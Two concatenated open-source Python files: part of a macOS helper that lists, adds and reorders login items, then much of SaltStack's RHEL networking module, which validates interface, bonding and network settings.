    SFL_bundle = NSBundle.bundleWithIdentifier_('com.apple.coreservices.SharedFileList')
    functions = [('LSSharedFileListCreate',              '^{OpaqueLSSharedFileListRef=}^{__CFAllocator=}^{__CFString=}@'),
                 ('LSSharedFileListCopySnapshot',        '^{__CFArray=}^{OpaqueLSSharedFileListRef=}o^I'),
                 ('LSSharedFileListItemCopyDisplayName', '^{__CFString=}^{OpaqueLSSharedFileListItemRef=}'),
                 ('LSSharedFileListItemResolve',         'i^{OpaqueLSSharedFileListItemRef=}Io^^{__CFURL=}o^{FSRef=[80C]}'),
                 ('LSSharedFileListItemMove',            'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListItemRef=}'),
                 ('LSSharedFileListItemRemove',          'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}'),
                 ('LSSharedFileListInsertItemURL',       '^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{__CFString=}^{OpaqueIconRef=}^{__CFURL=}^{__CFDictionary=}^{__CFArray=}'),
                 ('kLSSharedFileListItemBeforeFirst',    '^{OpaqueLSSharedFileListItemRef=}'),
                 ('kLSSharedFileListItemLast',           '^{OpaqueLSSharedFileListItemRef=}'),]
    objc.loadBundleFunctions(SFL_bundle, globals(), functions)
else:
    from LaunchServices import kLSSharedFileListItemBeforeFirst, kLSSharedFileListItemLast, \
                               LSSharedFileListCreate, LSSharedFileListCopySnapshot, \
                               LSSharedFileListItemCopyDisplayName, LSSharedFileListItemResolve, \
                               LSSharedFileListItemMove, LSSharedFileListItemRemove, \
                               LSSharedFileListInsertItemURL
def _get_login_items():
    """Return [list_ref, login_items] for the session login-items list."""
    # Shared-list reference for the current user's session login items.
    list_ref = LSSharedFileListCreate(None, kLSSharedFileListSessionLoginItems, None)
    # LSSharedFileListCopySnapshot also returns a seed value indicating
    # when the snapshot was taken; it is safe to discard here.
    login_items, _seed = LSSharedFileListCopySnapshot(list_ref, None)
    return [list_ref, login_items]
def _get_item_cfurl(an_item, flags=None):
    """Resolve a shared-file-list item to its CFURL.

    When *flags* is None, resolve without user interaction and without
    mounting volumes (the original comment's stated intent).
    """
    if flags is None:
        # Bug fix: the original summed kLSSharedFileListNoUserInteraction
        # with ITSELF, producing the wrong flag mask and never setting the
        # "do not mount" behavior the comment promised.
        try:
            from LaunchServices import kLSSharedFileListDoNotMountVolumes
            flags = (kLSSharedFileListNoUserInteraction
                     + kLSSharedFileListDoNotMountVolumes)
        except ImportError:
            # Constant unavailable in this pyobjc/OS combination; fall back
            # to non-interactive resolution only.
            flags = kLSSharedFileListNoUserInteraction
    err, a_CFURL, a_FSRef = LSSharedFileListItemResolve(an_item, flags, None, None)
    return a_CFURL
def list_login_items():
    """Return the filesystem paths of the user's login items."""
    # Resolve each item to a URL without mounting drives, then take .path().
    return [_get_item_cfurl(item).path() for item in _get_login_items()[1]]
def remove_login_item(path_to_item):
    """Remove *path_to_item* from the user's login items, if present."""
    current_paths = list_login_items()
    if path_to_item not in current_paths:
        return
    list_ref, current_items = _get_login_items()
    target_item = current_items[current_paths.index(path_to_item)]
    LSSharedFileListItemRemove(list_ref, target_item)
def add_login_item(path_to_item, position=-1):
    """Insert *path_to_item* into the session login items at *position*,
    working around LSSharedFileList insertion quirks (see comments below)."""
    # position:
    #   0..N: Attempt to insert at that index position, with 0 being first
    #   -1:   Insert as last item
    # Note:
    #   If the item is already present in the list, it will get moved to the new location automatically.
    list_ref, current_items = _get_login_items()
    added_item = NSURL.fileURLWithPath_(path_to_item)
    if position == 0:
        # Seems to be buggy, will force it below
        destination_point = kLSSharedFileListItemBeforeFirst
    elif position == -1:
        destination_point = kLSSharedFileListItemLast
    elif position >= len(current_items):
        # At or beyond to the end of the current list
        position = -1
        destination_point = kLSSharedFileListItemLast
    else:
        # 1 = after item 0, 2 = after item 1, etc.
        destination_point = current_items[position - 1]
    # The logic for LSSharedFileListInsertItemURL is generally fine when the item is not in the list
    # already (with the exception of kLSSharedFileListItemBeforeFirst which appears to be broken, period)
    # However, if the item is already in the list, the logic gets really really screwy.
    # Your index calculations are invalidated by OS X because you shift an item, possibly shifting the
    # indexes of other items in the list.
    # It's easier to just remove it first, then re-add it.
    current_paths = list_login_items()
    if (len(current_items) == 0) or (position == -1):
        # Either there's nothing there or it wants to be last
        # Just add the item, it'll be fine
        result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
    elif (position == 0):
        # Special case - kLSSharedFileListItemBeforeFirst appears broken on (at least) 10.9
        # Remove if already in the list
        if path_to_item in current_paths:
            i = current_paths.index(path_to_item)
            old_item = current_items[i]
            result = LSSharedFileListItemRemove(list_ref, old_item)
            # Regenerate list_ref and items
            list_ref, current_items = _get_login_items()
        if (len(current_items) == 0):
            # Simple case if nothing remains in the list
            result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
        else:
            # At least one item remains.
            # The fix for the bug is:
            # - Add our item after the first ('needs_fixing') item
            # - Move the 'needs_fixing' item to the end
            # - Move the 'needs_fixing' item after our added item (which is now first)
            needs_fixing = _get_item_cfurl(current_items[0])
            # Move our item
            result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, added_item, {}, [])
            if not (result is None):
                # Only shift if the first insert worked
                # Regenerate list_ref and items
                list_ref, current_items = _get_login_items()
                # Now move the old item last
                result = LSSharedFileListInsertItemURL(list_ref, kLSSharedFileListItemLast, None, None, needs_fixing, {}, [])
                # Regenerate list_ref and items
                list_ref, current_items = _get_login_items()
                # Now move the old item back under the new one
                result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, needs_fixing, {}, [])
    else:
        # We're aiming for an index based on something else in the list.
        # Only do something if we're not aiming at ourselves.
        insert_after_path = _get_item_cfurl(destination_point).path()
        if (insert_after_path != path_to_item):
            # Seems to be a different file
            if path_to_item in current_paths:
                # Remove our object if it's already present
                i = current_paths.index(path_to_item)
                self_item = current_items[i]
                result = LSSharedFileListItemRemove(list_ref, self_item)
                # Regenerate list_ref and items
                list_ref, current_items = _get_login_items()
                # Re-find our original target
                current_paths = list_login_items()
                i = current_paths.index(insert_after_path)
                destination_point = current_items[i]
            # Add ourselves after the file
            result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
|
dougn/HalfCaff
|
halfcaff/login.py
|
Python
|
mit
| 9,234
|
# -*- coding: utf-8 -*-
'''
The networking module for RHEL/Fedora based distros
'''
from __future__ import absolute_import
# Import python libs
import logging
import os.path
import os
# Import third party libs
import jinja2
import jinja2.exceptions
# Import salt libs
import salt.utils
import salt.utils.templates
import salt.utils.validate.net
import salt.ext.six as six
# Set up logging
log = logging.getLogger(__name__)
# Set up template environment
# Templates for the generated ifcfg/network files live under
# salt/templates/rh_ip.
JINJA = jinja2.Environment(
    loader=jinja2.FileSystemLoader(
        os.path.join(salt.utils.templates.TEMPLATE_DIRNAME, 'rh_ip')
    )
)
# Define the module's virtual name
# Loaded as the 'ip' execution module on RedHat-family systems.
__virtualname__ = 'ip'
def __virtual__():
    '''
    Confine this module to RHEL/Fedora based distros
    '''
    is_redhat_family = __grains__['os_family'] == 'RedHat'
    return __virtualname__ if is_redhat_family else False
# Setup networking attributes
# ethtool settings accepted in an interface's ETHTOOL_OPTS.
_ETHTOOL_CONFIG_OPTS = [
    'autoneg', 'speed', 'duplex',
    'rx', 'tx', 'sg', 'tso', 'ufo',
    'gso', 'gro', 'lro'
]
# Generic RH ifcfg options.
_RH_CONFIG_OPTS = [
    'domain', 'peerdns', 'peerntp', 'defroute',
    'mtu', 'static-routes', 'gateway', 'zone'
]
# Options accepted in a bonded interface's BONDING_OPTS.
_RH_CONFIG_BONDING_OPTS = [
    'mode', 'miimon', 'arp_interval',
    'arp_ip_target', 'downdelay', 'updelay',
    'use_carrier', 'lacp_rate', 'hashing-algorithm',
    'max_bonds', 'tx_queues', 'num_grat_arp',
    'num_unsol_na', 'primary', 'primary_reselect',
    'ad_select', 'xmit_hash_policy', 'arp_validate',
    'fail_over_mac', 'all_slaves_active', 'resend_igmp'
]
# Filesystem locations of the RH network configuration.
_RH_NETWORK_SCRIPT_DIR = '/etc/sysconfig/network-scripts'
_RH_NETWORK_FILE = '/etc/sysconfig/network'
_RH_NETWORK_CONF_FILES = '/etc/modprobe.d'
# Accepted truthy/falsy spellings in user-supplied settings.
_CONFIG_TRUE = ['yes', 'on', 'true', '1', True]
_CONFIG_FALSE = ['no', 'off', 'false', '0', False]
# Interface types this module knows how to configure.
_IFACE_TYPES = [
    'eth', 'bond', 'alias', 'clone',
    'ipsec', 'dialup', 'bridge', 'slave', 'vlan',
    'ipip', 'ib',
]
def _error_msg_iface(iface, option, expected):
'''
Build an appropriate error message from a given option and
a list of expected values.
'''
msg = 'Invalid option -- Interface: {0}, Option: {1}, Expected: [{2}]'
return msg.format(iface, option, '|'.join(expected))
def _error_msg_routes(iface, option, expected):
'''
Build an appropriate error message from a given option and
a list of expected values.
'''
msg = 'Invalid option -- Route interface: {0}, Option: {1}, Expected: [{2}]'
return msg.format(iface, option, expected)
def _log_default_iface(iface, opt, value):
    # Record (at INFO) that a default value is being applied for an
    # interface option the user did not specify.
    log.info(
        'Using default option -- Interface: {0} Option: {1} Value: {2}'.format(
            iface, opt, value))
def _error_msg_network(option, expected):
'''
Build an appropriate error message from a given option and
a list of expected values.
'''
msg = 'Invalid network setting -- Setting: {0}, Expected: [{1}]'
return msg.format(option, '|'.join(expected))
def _log_default_network(opt, value):
    # Record (at INFO) that an existing network setting is being kept.
    log.info(
        'Using existing setting -- Setting: {0} Value: {1}'.format(opt, value))
def _parse_rh_config(path):
    '''
    Parse a RH-style config file into a dict of upper-cased keys to values.
    Blank lines and lines starting with '!' or '#' are ignored; only the
    first '=' splits a line, and malformed lines are skipped.
    '''
    parsed = {}
    raw_lines = _read_file(path)
    if raw_lines:
        for raw in raw_lines:
            raw = raw.strip()
            if not raw or raw.startswith(('!', '#')):
                continue
            parts = [p.rstrip() for p in raw.split('=', 1)]
            if len(parts) == 2:
                name, value = parts
                parsed[name.upper()] = value
    return parsed
def _parse_ethtool_opts(opts, iface):
    '''
    Filters given options and outputs valid settings for ETHTOOLS_OPTS
    If an option has a value that is not expected, this
    function will log what the Interface, Setting and what it was
    expecting.
    '''
    config = {}
    if 'autoneg' in opts:
        autoneg = opts['autoneg']
        if autoneg in _CONFIG_TRUE:
            config['autoneg'] = 'on'
        elif autoneg in _CONFIG_FALSE:
            config['autoneg'] = 'off'
        else:
            _raise_error_iface(iface, 'autoneg', _CONFIG_TRUE + _CONFIG_FALSE)
    if 'duplex' in opts:
        valid = ['full', 'half']
        duplex = opts['duplex']
        if duplex in valid:
            config['duplex'] = duplex
        else:
            _raise_error_iface(iface, 'duplex', valid)
    if 'speed' in opts:
        valid = ['10', '100', '1000', '10000']
        if str(opts['speed']) in valid:
            config['speed'] = opts['speed']
        else:
            # Note: mirrors the original -- the *value* is reported in the
            # option slot of the error message here.
            _raise_error_iface(iface, opts['speed'], valid)
    # Boolean offload flags all share the same on/off handling.
    valid = _CONFIG_TRUE + _CONFIG_FALSE
    for flag in ('rx', 'tx', 'sg', 'tso', 'ufo', 'gso', 'gro', 'lro'):
        if flag not in opts:
            continue
        if opts[flag] in _CONFIG_TRUE:
            config[flag] = 'on'
        elif opts[flag] in _CONFIG_FALSE:
            config[flag] = 'off'
        else:
            _raise_error_iface(iface, flag, valid)
    return config
def _parse_settings_bond(opts, iface):
    '''
    Filters given options and outputs valid settings for requested
    operation. If an option has a value that is not expected, this
    function will log what the Interface, Setting and what it was
    expecting.

    Dispatches to _parse_settings_bond_0..6 based on opts['mode'], passing
    along the shared defaults below; raises (via _raise_error_iface) on an
    unknown mode.
    '''
    # Defaults shared by all bonding modes; individual parsers pick the
    # entries relevant to their mode.
    bond_def = {
        # 803.ad aggregation selection logic
        # 0 for stable (default)
        # 1 for bandwidth
        # 2 for count
        'ad_select': '0',
        # Max number of transmit queues (default = 16)
        'tx_queues': '16',
        # Link monitoring in milliseconds. Most NICs support this
        'miimon': '100',
        # ARP interval in milliseconds
        'arp_interval': '250',
        # Delay before considering link down in milliseconds (miimon * 2)
        'downdelay': '200',
        # lacp_rate 0: Slow - every 30 seconds
        # lacp_rate 1: Fast - every 1 second
        'lacp_rate': '0',
        # Max bonds for this driver
        'max_bonds': '1',
        # Specifies the time, in milliseconds, to wait before
        # enabling a slave after a link recovery has been
        # detected. Only used with miimon.
        'updelay': '0',
        # Used with miimon.
        # On: driver sends mii
        # Off: ethtool sends mii
        'use_carrier': 'on',
        # Default. Don't change unless you know what you are doing.
        'xmit_hash_policy': 'layer2',
    }
    # Each mode accepts both its numeric and symbolic spelling.
    if opts['mode'] in ['balance-rr', '0']:
        log.info(
            'Device: {0} Bonding Mode: load balancing (round-robin)'.format(
                iface
            )
        )
        return _parse_settings_bond_0(opts, iface, bond_def)
    elif opts['mode'] in ['active-backup', '1']:
        log.info(
            'Device: {0} Bonding Mode: fault-tolerance (active-backup)'.format(
                iface
            )
        )
        return _parse_settings_bond_1(opts, iface, bond_def)
    elif opts['mode'] in ['balance-xor', '2']:
        log.info(
            'Device: {0} Bonding Mode: load balancing (xor)'.format(iface)
        )
        return _parse_settings_bond_2(opts, iface, bond_def)
    elif opts['mode'] in ['broadcast', '3']:
        log.info(
            'Device: {0} Bonding Mode: fault-tolerance (broadcast)'.format(
                iface
            )
        )
        return _parse_settings_bond_3(opts, iface, bond_def)
    elif opts['mode'] in ['802.3ad', '4']:
        log.info(
            'Device: {0} Bonding Mode: IEEE 802.3ad Dynamic link '
            'aggregation'.format(iface)
        )
        return _parse_settings_bond_4(opts, iface, bond_def)
    elif opts['mode'] in ['balance-tlb', '5']:
        log.info(
            'Device: {0} Bonding Mode: transmit load balancing'.format(iface)
        )
        return _parse_settings_bond_5(opts, iface, bond_def)
    elif opts['mode'] in ['balance-alb', '6']:
        log.info(
            'Device: {0} Bonding Mode: adaptive load balancing'.format(iface)
        )
        return _parse_settings_bond_6(opts, iface, bond_def)
    else:
        valid = [
            '0', '1', '2', '3', '4', '5', '6',
            'balance-rr', 'active-backup', 'balance-xor',
            'broadcast', '802.3ad', 'balance-tlb', 'balance-alb'
        ]
        _raise_error_iface(iface, 'mode', valid)
def _parse_settings_bond_0(opts, iface, bond_def):
    '''
    Validate and collect bonding options for mode 0 (balance-rr).

    arp_ip_target (a list of 1-16 IPs) is mandatory for this mode;
    arp_interval falls back to bond_def when omitted. Invalid values are
    reported via _raise_error_iface, which raises AttributeError.
    '''
    bond = {'mode': '0'}

    # ARP targets in n.n.n.n form; mandatory, 1 to 16 entries.
    valid = ['list of ips (up to 16)']
    targets = opts.get('arp_ip_target')
    if not isinstance(targets, list) or not 1 <= len(targets) <= 16:
        _raise_error_iface(iface, 'arp_ip_target', valid)
    else:
        # The kernel expects a single comma-separated string.
        bond['arp_ip_target'] = ','.join(targets)

    # arp_interval must look like an integer; default otherwise.
    if 'arp_interval' not in opts:
        _log_default_iface(iface, 'arp_interval', bond_def['arp_interval'])
        bond['arp_interval'] = bond_def['arp_interval']
    else:
        try:
            int(opts['arp_interval'])
        except Exception:
            _raise_error_iface(iface, 'arp_interval', ['integer'])
        else:
            bond['arp_interval'] = opts['arp_interval']

    return bond
def _parse_settings_bond_1(opts, iface, bond_def):
    '''
    Validate and collect bonding options for mode 1 (active-backup).

    Malformed values are reported via _raise_error_iface; omitted values
    fall back to bond_def and are logged via _log_default_iface.
    '''
    bond = {'mode': '1'}

    # Millisecond timers must parse as integers.
    for timer in ('miimon', 'downdelay', 'updelay'):
        if timer not in opts:
            _log_default_iface(iface, timer, bond_def[timer])
            bond[timer] = bond_def[timer]
            continue
        try:
            int(opts[timer])
        except Exception:
            _raise_error_iface(iface, timer, ['integer'])
        else:
            bond[timer] = opts[timer]

    # Normalize use_carrier to the kernel's '1'/'0' representation.
    if 'use_carrier' not in opts:
        _log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
        bond['use_carrier'] = bond_def['use_carrier']
    elif opts['use_carrier'] in _CONFIG_TRUE:
        bond['use_carrier'] = '1'
    elif opts['use_carrier'] in _CONFIG_FALSE:
        bond['use_carrier'] = '0'
    else:
        _raise_error_iface(iface, 'use_carrier', _CONFIG_TRUE + _CONFIG_FALSE)

    return bond
def _parse_settings_bond_2(opts, iface, bond_def):
    '''
    Validate and collect bonding options for mode 2 (balance-xor).

    arp_ip_target (a list of 1-16 IPs) is mandatory; arp_interval falls
    back to bond_def when omitted. 'primary' is copied through verbatim
    and 'hashing-algorithm' is mapped onto xmit_hash_policy.
    '''
    bond = {'mode': '2'}

    # ARP targets in n.n.n.n form; mandatory, 1 to 16 entries.
    valid = ['list of ips (up to 16)']
    targets = opts.get('arp_ip_target')
    if not isinstance(targets, list) or not 1 <= len(targets) <= 16:
        _raise_error_iface(iface, 'arp_ip_target', valid)
    else:
        # The kernel expects a single comma-separated string.
        bond['arp_ip_target'] = ','.join(targets)

    # arp_interval must look like an integer; default otherwise.
    if 'arp_interval' not in opts:
        _log_default_iface(iface, 'arp_interval', bond_def['arp_interval'])
        bond['arp_interval'] = bond_def['arp_interval']
    else:
        try:
            int(opts['arp_interval'])
        except Exception:
            _raise_error_iface(iface, 'arp_interval', ['integer'])
        else:
            bond['arp_interval'] = opts['arp_interval']

    if 'primary' in opts:
        bond['primary'] = opts['primary']

    if 'hashing-algorithm' in opts:
        valid = ['layer2', 'layer2+3', 'layer3+4']
        if opts['hashing-algorithm'] not in valid:
            _raise_error_iface(iface, 'hashing-algorithm', valid)
        bond['xmit_hash_policy'] = opts['hashing-algorithm']

    return bond
def _parse_settings_bond_3(opts, iface, bond_def):
    '''
    Validate and collect bonding options for mode 3 (broadcast).

    Malformed values are reported via _raise_error_iface; omitted values
    fall back to bond_def and are logged via _log_default_iface.
    '''
    bond = {'mode': '3'}

    # The three timer options must be integral (milliseconds).
    for option in ('miimon', 'downdelay', 'updelay'):
        if option in opts:
            try:
                int(opts[option])
            except Exception:
                _raise_error_iface(iface, option, ['integer'])
            else:
                bond[option] = opts[option]
        else:
            _log_default_iface(iface, option, bond_def[option])
            bond[option] = bond_def[option]

    # Normalize use_carrier to '1'/'0'.
    if 'use_carrier' in opts:
        flag = opts['use_carrier']
        if flag in _CONFIG_TRUE:
            bond['use_carrier'] = '1'
        elif flag in _CONFIG_FALSE:
            bond['use_carrier'] = '0'
        else:
            _raise_error_iface(iface, 'use_carrier', _CONFIG_TRUE + _CONFIG_FALSE)
    else:
        _log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
        bond['use_carrier'] = bond_def['use_carrier']

    return bond
def _parse_settings_bond_4(opts, iface, bond_def):
    '''
    Validate and collect bonding options for mode 4 (IEEE 802.3ad
    dynamic link aggregation).

    lacp_rate accepts 'fast'/'slow' and is normalized to '1'/'0';
    everything else must be integral. Missing options fall back to
    bond_def; 'hashing-algorithm' maps onto xmit_hash_policy.
    '''
    bond = {'mode': '4'}

    for setting in ('miimon', 'downdelay', 'updelay', 'lacp_rate', 'ad_select'):
        if setting not in opts:
            _log_default_iface(iface, setting, bond_def[setting])
            bond[setting] = bond_def[setting]
            continue
        if setting == 'lacp_rate':
            # Accept symbolic names and normalize to the kernel's 0/1.
            if opts[setting] == 'fast':
                opts.update({setting: '1'})
            if opts[setting] == 'slow':
                opts.update({setting: '0'})
            valid = ['fast', '1', 'slow', '0']
        else:
            valid = ['integer']
        try:
            int(opts[setting])
        except Exception:
            _raise_error_iface(iface, setting, valid)
        else:
            bond[setting] = opts[setting]

    # Normalize use_carrier to '1'/'0'.
    if 'use_carrier' not in opts:
        _log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
        bond['use_carrier'] = bond_def['use_carrier']
    elif opts['use_carrier'] in _CONFIG_TRUE:
        bond['use_carrier'] = '1'
    elif opts['use_carrier'] in _CONFIG_FALSE:
        bond['use_carrier'] = '0'
    else:
        _raise_error_iface(iface, 'use_carrier', _CONFIG_TRUE + _CONFIG_FALSE)

    if 'hashing-algorithm' in opts:
        valid = ['layer2', 'layer2+3', 'layer3+4']
        if opts['hashing-algorithm'] not in valid:
            _raise_error_iface(iface, 'hashing-algorithm', valid)
        bond['xmit_hash_policy'] = opts['hashing-algorithm']

    return bond
def _parse_settings_bond_5(opts, iface, bond_def):
    '''
    Validate and collect bonding options for mode 5 (balance-tlb,
    transmit load balancing).

    Malformed values are reported via _raise_error_iface; omitted values
    fall back to bond_def and are logged via _log_default_iface.
    '''
    bond = {'mode': '5'}

    # Millisecond timers must parse as integers.
    for timer in ('miimon', 'downdelay', 'updelay'):
        if timer not in opts:
            _log_default_iface(iface, timer, bond_def[timer])
            bond[timer] = bond_def[timer]
            continue
        try:
            int(opts[timer])
        except Exception:
            _raise_error_iface(iface, timer, ['integer'])
        else:
            bond[timer] = opts[timer]

    # Normalize use_carrier to '1'/'0'.
    if 'use_carrier' not in opts:
        _log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
        bond['use_carrier'] = bond_def['use_carrier']
    elif opts['use_carrier'] in _CONFIG_TRUE:
        bond['use_carrier'] = '1'
    elif opts['use_carrier'] in _CONFIG_FALSE:
        bond['use_carrier'] = '0'
    else:
        _raise_error_iface(iface, 'use_carrier', _CONFIG_TRUE + _CONFIG_FALSE)

    return bond
def _parse_settings_bond_6(opts, iface, bond_def):
    '''
    Validate and collect bonding options for mode 6 (balance-alb,
    adaptive load balancing).

    Malformed values are reported via _raise_error_iface; omitted values
    fall back to bond_def and are logged via _log_default_iface.
    '''
    bond = {'mode': '6'}

    # The three timer options must be integral (milliseconds).
    for option in ('miimon', 'downdelay', 'updelay'):
        if option in opts:
            try:
                int(opts[option])
            except Exception:
                _raise_error_iface(iface, option, ['integer'])
            else:
                bond[option] = opts[option]
        else:
            _log_default_iface(iface, option, bond_def[option])
            bond[option] = bond_def[option]

    # Normalize use_carrier to '1'/'0'.
    if 'use_carrier' in opts:
        flag = opts['use_carrier']
        if flag in _CONFIG_TRUE:
            bond['use_carrier'] = '1'
        elif flag in _CONFIG_FALSE:
            bond['use_carrier'] = '0'
        else:
            _raise_error_iface(iface, 'use_carrier', _CONFIG_TRUE + _CONFIG_FALSE)
    else:
        _log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
        bond['use_carrier'] = bond_def['use_carrier']

    return bond
def _parse_settings_eth(opts, iface_type, enabled, iface):
    '''
    Filters given options and outputs valid settings for a
    network interface.

    opts       -- raw settings requested for the interface
    iface_type -- interface type (eth, bond, bridge, slave, vlan,
                  ipip, ib, ...); must already be validated by the caller
    enabled    -- whether the interface should come up on boot (ONBOOT)
    iface      -- interface name

    Invalid values are reported via _raise_error_iface (raises
    AttributeError). Returns the dict consumed by the ifcfg template.
    '''
    result = {'name': iface}
    if 'proto' in opts:
        valid = ['none', 'bootp', 'dhcp']
        if opts['proto'] in valid:
            result['proto'] = opts['proto']
        else:
            _raise_error_iface(iface, opts['proto'], valid)
    if 'dns' in opts:
        result['dns'] = opts['dns']
        # DNS entries only take effect with PEERDNS enabled.
        result['peerdns'] = 'yes'
    if 'mtu' in opts:
        try:
            result['mtu'] = int(opts['mtu'])
        except ValueError:
            _raise_error_iface(iface, 'mtu', ['integer'])
    if iface_type not in ['bridge']:
        ethtool = _parse_ethtool_opts(opts, iface)
        if ethtool:
            result['ethtool'] = ethtool
    if iface_type == 'slave':
        # Slaves never configure their own address; the master does.
        result['proto'] = 'none'
    if iface_type == 'bond':
        bonding = _parse_settings_bond(opts, iface)
        if bonding:
            result['bonding'] = bonding
    if iface_type not in ['bond', 'vlan', 'bridge', 'ipip']:
        if 'addr' in opts:
            if salt.utils.validate.net.mac(opts['addr']):
                result['addr'] = opts['addr']
            else:
                _raise_error_iface(iface, opts['addr'], ['AA:BB:CC:DD:EE:FF'])
        else:
            # If interface type is slave for bond, not setting hwaddr
            if iface_type != 'slave':
                ifaces = __salt__['network.interfaces']()
                if iface in ifaces and 'hwaddr' in ifaces[iface]:
                    result['addr'] = ifaces[iface]['hwaddr']
    if iface_type == 'bridge':
        result['devtype'] = 'Bridge'
        bypassfirewall = True
        valid = _CONFIG_TRUE + _CONFIG_FALSE
        for opt in ['bypassfirewall']:
            if opt in opts:
                if opts[opt] in _CONFIG_TRUE:
                    bypassfirewall = True
                elif opts[opt] in _CONFIG_FALSE:
                    bypassfirewall = False
                else:
                    _raise_error_iface(iface, opts[opt], valid)
        # Toggle netfilter for bridged traffic system-wide to match the
        # bypassfirewall setting.
        if bypassfirewall:
            __salt__['sysctl.persist']('net.bridge.bridge-nf-call-ip6tables', '0')
            __salt__['sysctl.persist']('net.bridge.bridge-nf-call-iptables', '0')
            __salt__['sysctl.persist']('net.bridge.bridge-nf-call-arptables', '0')
        else:
            __salt__['sysctl.persist']('net.bridge.bridge-nf-call-ip6tables', '1')
            __salt__['sysctl.persist']('net.bridge.bridge-nf-call-iptables', '1')
            __salt__['sysctl.persist']('net.bridge.bridge-nf-call-arptables', '1')
    else:
        if 'bridge' in opts:
            result['bridge'] = opts['bridge']
    if iface_type == 'ipip':
        result['devtype'] = 'IPIP'
        for opt in ['my_inner_ipaddr', 'my_outer_ipaddr']:
            if opt not in opts:
                # BUGFIX: report the *name* of the missing option. The old
                # code did opts[opt] here, which raised KeyError for a
                # missing key instead of the intended error message.
                _raise_error_iface(iface, opt, ['1.2.3.4'])
            else:
                result[opt] = opts[opt]
    if iface_type == 'ib':
        result['devtype'] = 'InfiniBand'
    for opt in ['ipaddr', 'master', 'netmask', 'srcaddr', 'delay', 'domain', 'gateway', 'zone']:
        if opt in opts:
            result[opt] = opts[opt]
    for opt in ['ipv6addr', 'ipv6gateway']:
        if opt in opts:
            result[opt] = opts[opt]
    for opt in ['ipaddrs', 'ipv6addrs']:
        if opt in opts:
            result[opt] = opts[opt]
    if 'ipv6_autoconf' in opts:
        result['ipv6_autoconf'] = opts['ipv6_autoconf']
    if 'enable_ipv6' in opts:
        result['enable_ipv6'] = opts['enable_ipv6']
    valid = _CONFIG_TRUE + _CONFIG_FALSE
    for opt in ['onparent', 'peerdns', 'peerntp', 'slave', 'vlan', 'defroute', 'stp']:
        if opt in opts:
            if opts[opt] in _CONFIG_TRUE:
                result[opt] = 'yes'
            elif opts[opt] in _CONFIG_FALSE:
                result[opt] = 'no'
            else:
                _raise_error_iface(iface, opts[opt], valid)
    if 'onboot' in opts:
        log.warning(
            'The \'onboot\' option is controlled by the \'enabled\' option. '
            'Interface: {0} Enabled: {1}'.format(iface, enabled)
        )
    if enabled:
        result['onboot'] = 'yes'
    else:
        result['onboot'] = 'no'
    # If the interface is defined then we want to always take
    # control away from non-root users; unless the administrator
    # wants to allow non-root users to control the device.
    if 'userctl' in opts:
        if opts['userctl'] in _CONFIG_TRUE:
            result['userctl'] = 'yes'
        elif opts['userctl'] in _CONFIG_FALSE:
            result['userctl'] = 'no'
        else:
            _raise_error_iface(iface, opts['userctl'], valid)
    else:
        result['userctl'] = 'no'
    # This vlan is in opts, and should be only used in range interface
    # will affect jinja template for interface generating
    if 'vlan' in opts:
        if opts['vlan'] in _CONFIG_TRUE:
            result['vlan'] = 'yes'
        elif opts['vlan'] in _CONFIG_FALSE:
            result['vlan'] = 'no'
        else:
            _raise_error_iface(iface, opts['vlan'], valid)
    if 'arpcheck' in opts:
        if opts['arpcheck'] in _CONFIG_FALSE:
            result['arpcheck'] = 'no'
    if 'ipaddr_start' in opts:
        result['ipaddr_start'] = opts['ipaddr_start']
    if 'ipaddr_end' in opts:
        result['ipaddr_end'] = opts['ipaddr_end']
    if 'clonenum_start' in opts:
        result['clonenum_start'] = opts['clonenum_start']
    return result
def _parse_routes(iface, opts):
    '''
    Filters given options and outputs valid settings for
    the route settings file.

    Raises (via _raise_error_routes) when no 'routes' key is present;
    otherwise returns all options with lower-cased keys.
    '''
    # Normalize keys to lower case.
    opts = dict((key.lower(), value) for (key, value) in six.iteritems(opts))
    if 'routes' not in opts:
        _raise_error_routes(iface, 'routes', 'List of routes')
    # Every option (including 'routes') is passed through to the template.
    return dict(opts)
def _parse_network_settings(opts, current):
    '''
    Filters given options and outputs valid settings for
    the global network settings file.

    opts    -- requested settings
    current -- settings parsed from the existing network file, used as
               fall-back defaults

    Raises AttributeError (via _raise_error_network) on invalid values.
    '''
    # Normalize keys
    opts = dict((k.lower(), v) for (k, v) in six.iteritems(opts))
    current = dict((k.lower(), v) for (k, v) in six.iteritems(current))
    result = {}
    valid = _CONFIG_TRUE + _CONFIG_FALSE
    if 'enabled' not in opts:
        try:
            opts['networking'] = current['networking']
            _log_default_network('networking', current['networking'])
        except (KeyError, ValueError):
            # BUGFIX: a missing 'networking' key raises KeyError, which the
            # old 'except ValueError' never caught, so the KeyError escaped
            # instead of producing the friendly error below.
            _raise_error_network('networking', valid)
    else:
        opts['networking'] = opts['enabled']
    if opts['networking'] in valid:
        if opts['networking'] in _CONFIG_TRUE:
            result['networking'] = 'yes'
        elif opts['networking'] in _CONFIG_FALSE:
            result['networking'] = 'no'
    else:
        _raise_error_network('networking', valid)
    if 'hostname' not in opts:
        try:
            opts['hostname'] = current['hostname']
            _log_default_network('hostname', current['hostname'])
        except Exception:
            _raise_error_network('hostname', ['server1.example.com'])
    if opts['hostname']:
        result['hostname'] = opts['hostname']
    else:
        _raise_error_network('hostname', ['server1.example.com'])
    if 'nozeroconf' in opts:
        if opts['nozeroconf'] in valid:
            if opts['nozeroconf'] in _CONFIG_TRUE:
                result['nozeroconf'] = 'true'
            elif opts['nozeroconf'] in _CONFIG_FALSE:
                result['nozeroconf'] = 'false'
        else:
            _raise_error_network('nozeroconf', valid)
    # Pass any remaining options straight through.
